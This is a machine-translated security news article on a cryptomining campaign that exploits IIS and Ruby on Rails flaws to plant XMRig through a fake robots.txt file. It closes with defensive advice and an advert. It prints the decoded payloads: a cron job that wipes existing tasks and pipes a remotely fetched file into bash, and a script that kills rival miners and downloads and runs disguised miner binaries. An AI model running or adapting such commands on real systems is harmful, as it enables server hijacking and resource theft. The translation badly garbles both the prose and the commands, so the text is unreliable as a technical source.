Attacks on Web servers: check your robots file .txt, because you can hide excavator Monero

Company Check Point observed attacks that use vulnerabilities in Web servers (Microsoft IIS and Ruby on Rails) to infection of a how many machines the script XMRig Monero Exchange it for a while. A few hours after the publication of the first analysis, infected more than 700 servers around the world. Most us sites administrators are reprimanded, Germany, Great Britain, Norway and Sweden — although according to Check Point may not even be a country in which there are to infection.

To identify vulnerabilities in Web servers the attackers most likely wykosztują p0f tool.

If a server on one of the vulnerabilities ( CVE-2013-015 , CVE-2013-4878 , CVE-2012-1823 , CVE-2012-2335 , CVE-2012-2311 , CVE-2012-2336 , CVE-2005-267 ) will be located, it first runs the code in the POST method, which gets the final payload:


The attacker to inject PHP code on the Ruby on Rails servers and Microsoft IIS uses the vulnerability CVE-2013-0156 and CVE-2005-2678 with the same payloadem as for Apache, but base64-encoded:


Decoded payload looks like this:

System ('crontab-r; wget-V & & echo "1 **** wget-q-O-< a href =" "> </a> 2 >/dev/null/dev/null > > 2 bash | & 1" | crontab-; wget-V || curl-V | echo "1 **** curl-s < a href =" "> </a> 2 >/dev/null/dev/null > > 2 bash | & 1" | crontab-')

The payload on the server executes the command crontab –r that removes all of the remaining tasks and add your own:

echo "1 **** wget-q-O-hxxp:// 2 >/dev/null/dev/null > > 2 bash | & 1" | crontab-  

So "infected" the server in the first minute of each hour trying to download the modified file robots. txt (normally used to block bots online e.g. in order to prevent indexing of the entire page or links) from the the domain, making it available online. "By the way" is the code you place in robots. txt, similar to this:

x86_64 = ""
i686 = ""
touch test || CD/dev/shm || CD/tmp 2 >/dev/null
> $MAIL & & chmod 000 $MAIL
rm. test 2 >/dev/null
/dev/null 2, sshd rm pkill-9 xmrig 2 >/dev/null
pid = $ (pgrep-f-o 'tQwSXfdLn 6avycd1bMp6RJTsNfwdPrMPWbz8 ')
test $pid & & pgrep-f 'tQwSXfdLn 6avycd1bMp6RJTsNfwdPrMPWbz8 ' | grep-vw $pid | XARGS-r kill-9
pgrep-f tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8 & & exit 0
wget--no-check-certificate ' $x 86_64 "-o. sshd | | curl-k "$x" 86_64-o. sshd
wget--no-check-certificate ' $i 686 "-o. sshd. i686 || curl-k "$i 686"-o. sshd. i686
chmod + x. sshd. sshd. i686
pgrep-f hashvault | |. /.sshd-o 45e9rBtQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8crBXzPeGPLM6t8QE3s6JS5LNJUGMGmibF9yZhjVoCbUvz989EsT6h-p x-k-B || wget < a href = "" > </a>-O/dev/null--user-agent "$ (uname-r) ' | | curl < a href = "" > </a>--user-agent "$ (uname-r) '
pgrep-f hashvault | |. /.sshd.i686-o 45e9rBtQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8crBXzPeGPLM6t8QE3s6JS5LNJUGMGmibF9yZhjVoCbUvz989EsT6h-p x-k-B || wget < a href = "" > </a>-O/dev/null--user-agent "$ (uname-a)" || curl < a href = "" > </a>--user-agent "$ (uname-a)" < br/>

Experts indicate that the striker applied the trick to running code from a file robots. txt every hour, so you will be able to modify the commands and such. stop extracting Monero at any time (if necessary).

Based on the address of the portfolio Monero managed to determine that within 24 hours of zainfekowano approximately 700 servers, which gave attackers to 540 dollars of income.

Featured here the case is nothing new. More and more often among cybercriminals are seeing interest in monetyzowaniem this method by computer calculations. According to the statistics of ESET attackers adjust to trends and change phishing ransom by encrypting the files ransomware'm to kicking the refreshed. To confirm this thesis just have a look at the chart below for our country:

eset statystyki

Statistics provided by ESET indicate malware detected as JS/CoinMiner — and so malicious JavaScript code — which is up 33% of all threats detected on users ' computers with the Polish.

Similar an incident of a Digger Monero has recently any subverted website, as well as Polish news service

This and similar attacks can be prevented. Administrators we suggest you to care about the systematic application updates that are installed on the server, as well as scripts and extensions added to Web sites. Home users we recommend reputable antivirus software, but necessarily that has browser protection. Only in this way it will be possible to detect and block malicious script. People who do not want to use the AV, we recommend one of the ad blockerów (preferably uBlock) or an extension of the NoCoin, which is available for Chrome/Chromium, Firefox and Opera.

Learn more about our offer

If you sell security solutions, are a distributor, authorized partner or developer and would like to share your portfolio with a group of potential customers, advertise an event, software, hardware or other services on AVLab - simply write to us. Or maybe you had to deal with ransomware? We can also help you decrypt your files.
Read more

We use Google Cloud Translation and Gengo API’s to translate articles with exception of our comparative tests.